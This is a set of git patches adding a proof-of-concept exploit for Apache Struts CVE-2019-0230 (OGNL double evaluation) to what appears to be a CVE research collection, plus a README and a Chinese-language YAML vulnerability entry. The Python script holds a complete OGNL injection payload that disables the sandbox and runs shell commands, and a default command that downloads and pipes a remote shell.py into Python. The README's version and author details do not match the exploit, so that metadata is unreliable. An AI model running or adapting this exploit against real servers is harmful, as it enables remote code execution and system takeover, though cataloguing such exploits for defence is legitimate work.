From 6d9a4f5e1fa6a00b47e8ea20ba9460a53e6d129b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:08:53 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From bc57bcbc91971c2b9a1103e72b2cfafaad97aa33 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:29 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 698a6b303173f1c4b3d06cd5b3442d4a4791d74c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:48 +0000 Subject: [PATCH 03/19] POC Signed-off-by: fanyunpeng --- .../CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py diff --git a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 00000000..1551ebac --- /dev/null +++ b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py @@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From 7ff3d23d6af60b8f34d1639ce93740e0951c4070 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:09:54 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7b66e6a3946f01aa9e9bae39419dc19306f9e130 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:16 +0000 Subject: [PATCH 05/19] add cve/apache-Struts/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- cve/apache-Struts/CVE-2019-0230/README.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Struts/CVE-2019-0230/README.md diff --git a/cve/apache-Struts/CVE-2019-0230/README.md b/cve/apache-Struts/CVE-2019-0230/README.md new file mode 100644 index 00000000..b9a4f94c --- /dev/null +++ b/cve/apache-Struts/CVE-2019-0230/README.md @@ -0,0 +1,21 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From b7557c40ba4feba51a93d12ea3ffc1e76e929a5e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:35 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 29e87cc776a7574cd326e9cd9c0d969ba76dda88 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:10:42 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From cba76fcb0fd4d42fd8d1c82a773935f577e0a45c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:11:17 +0000 Subject: [PATCH 08/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3c8957b1b665cf7cc48bc89c0b290d554cb9f467 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:11:56 +0000 Subject: [PATCH 09/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 628390144b05161cf09e38ee53291135b6c978b3 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:12:10 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6a382dcea0da0421f01e27b32ab0d2c676ac56ab Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:12:50 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 218ea68c1b1a63b197817ececf6d64adc7d6686d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:06 +0000 Subject: [PATCH 12/19] add cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml. Signed-off-by: fanyunpeng --- .../2019/yaml/CVE-2019-0230.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml new file mode 100644 index 00000000..e1e4a6e8 --- /dev/null +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 -- Gitee From 6aa3620024f173fd5a0d059085947bd06f512788 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:15 +0000 Subject: [PATCH 13/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f52141ccefef0c35510e1df07a86c68ab80de33d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:36 +0000 Subject: [PATCH 14/19] add cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/README.md diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md new file mode 100644 index 00000000..b9a4f94c --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -0,0 +1,21 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 +https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From c81e0d7626d07eecc9dcf44cbd12ac02c50c1327 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:44 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From ab87e3aef5b78fca230de7bac66e103d7350d214 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:13:58 +0000 Subject: [PATCH 16/19] poc Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 00000000..1551ebac --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py @@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From f695fbf0c813212a1ebe101f033df455f5d58a2b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:14:09 +0000 Subject: [PATCH 17/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2019-0230/CVE-2019-0230.py | 163 ------------------ cve/apache-Struts/CVE-2019-0230/README.md | 21 --- 2 files changed, 184 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py delete mode 100644 cve/apache-Struts/CVE-2019-0230/README.md diff --git a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py deleted file mode 100644 index 1551ebac..00000000 --- a/cve/apache-Struts/CVE-2019-0230/CVE-2019-0230.py +++ /dev/null @@ -1,163 +0,0 @@ -# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation -# Date: 08/18/2020 -# Exploit Author: West Shepherd -# Vendor Homepage: https://struts.apache.org/download.cgi -# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) -# CVE : CVE-2019-0230 -# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. -# Source(s): -# https://github.com/PrinceFPF/CVE-2019-0230 -# https://cwiki.apache.org/confluence/display/WW/S2-059 -# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 - -# !/usr/bin/python -from sys import argv, exit, stdout, stderr -import argparse -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import logging - - -class Exploit: - def __init__( - self, - target='', - redirect=False, - proxy_address='' - ): - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - self.target = target - self.session = requests.session() - self.redirect = redirect - self.timeout = 0.5 - self.proxies = { - 'http': 'http://%s' % proxy_address, - 'https': 'http://%s' % proxy_address - } \ - if proxy_address is not None \ - and proxy_address != '' else {} - self.query_params = {} - self.form_values = {} - self.cookies = {} - boundary = "---------------------------735323031399963166993862150" - self.headers = { - 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, - 'Accept': '*/*', - 'Connection': 'close' - } - payload = "%{(#nike='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?(#_memberAccess=#dm):" \ - -"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." -\ - -"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." -\ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ - -"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." -\ - -"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new -java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ - -"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." -\ - -"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." -\ - "(#ros.flush())}" - - self.payload = "--%s\r\nContent-Disposition: form-data; -name=\"foo\"; " \ - "filename=\"%s\0b\"\r\nContent-Type: -text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( - boundary, payload, boundary - ) - - def do_get(self, url, params=None, data=None): - return self.session.get( - url=url, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - data=data, - params=params - ) - - def do_post(self, url, data=None, params=None): - return self.session.post( - url=url, - data=data, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - params=params - ) - - def debug(self): - try: - import http.client as http_client - except ImportError: - import httplib as http_client - http_client.HTTPConnection.debuglevel = 1 - logging.basicConfig() - logging.getLogger().setLevel(logging.DEBUG) - requests_log = logging.getLogger("requests.packages.urllib3") - requests_log.setLevel(logging.DEBUG) - requests_log.propagate = True - return self - - def send_payload(self, command='curl --insecure -sv -https://10.10.10.10/shell.py|python -'): - url = self.target - stdout.write('sending payload to %s payload %s' % (url, command)) - resp = self.do_post(url=url, params=self.query_params, -data=self.payload.replace('{COMMAND}', command)) - return resp - - -if __name__ == '__main__': - parser = argparse.ArgumentParser(add_help=True, - description='CVE-2020-0230 Struts -2 exploit') - try: - parser.add_argument('-target', action='store', help='Target -address: http(s)://target.com/index.action') - parser.add_argument('-command', action='store', - help='Command to execute: touch /tmp/pwn') - parser.add_argument('-debug', action='store', default=False, -help='Enable debugging: False') - parser.add_argument('-proxy', action='store', default='', -help='Enable proxy: 10.10.10.10:8080') - - if len(argv) == 1: - parser.print_help() - exit(1) - options = parser.parse_args() - - exp = Exploit( - proxy_address=options.proxy, - target=options.target - ) - - if options.debug: - exp.debug() - stdout.write('target %s debug %s proxy %s\n' % ( - options.target, options.debug, options.proxy - )) - - result = exp.send_payload(command=options.command) - stdout.write('Response: %d\n' % result.status_code) - - except Exception as error: - -stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/CVE-2019-0230/README.md b/cve/apache-Struts/CVE-2019-0230/README.md deleted file mode 100644 index b9a4f94c..00000000 --- a/cve/apache-Struts/CVE-2019-0230/README.md +++ /dev/null @@ -1,21 +0,0 @@ -# Apache Struts 2.5.20 - Double OGNL evaluation -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2019-0230 -Credits: Ash Daulton and the cPanel Security Team -# Usage -``` -python CVE-2019-0230.py + --target : Target address --command : Command to execute --debug : Enable debugging --proxy : Enable proxy -``` -# reference -http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html -http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -https://cwiki.apache.org/confluence/display/ww/s2-059 -https://launchpad.support.sap.com/#/notes/2982840 -https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From d8d208399272220ff2793cf48748bb3d85467fc9 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:14:17 +0000 Subject: [PATCH 18/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8ac96bed652a31691d7a66b8d41f936b16b8fac2 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:15:36 +0000 Subject: [PATCH 19/19] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- 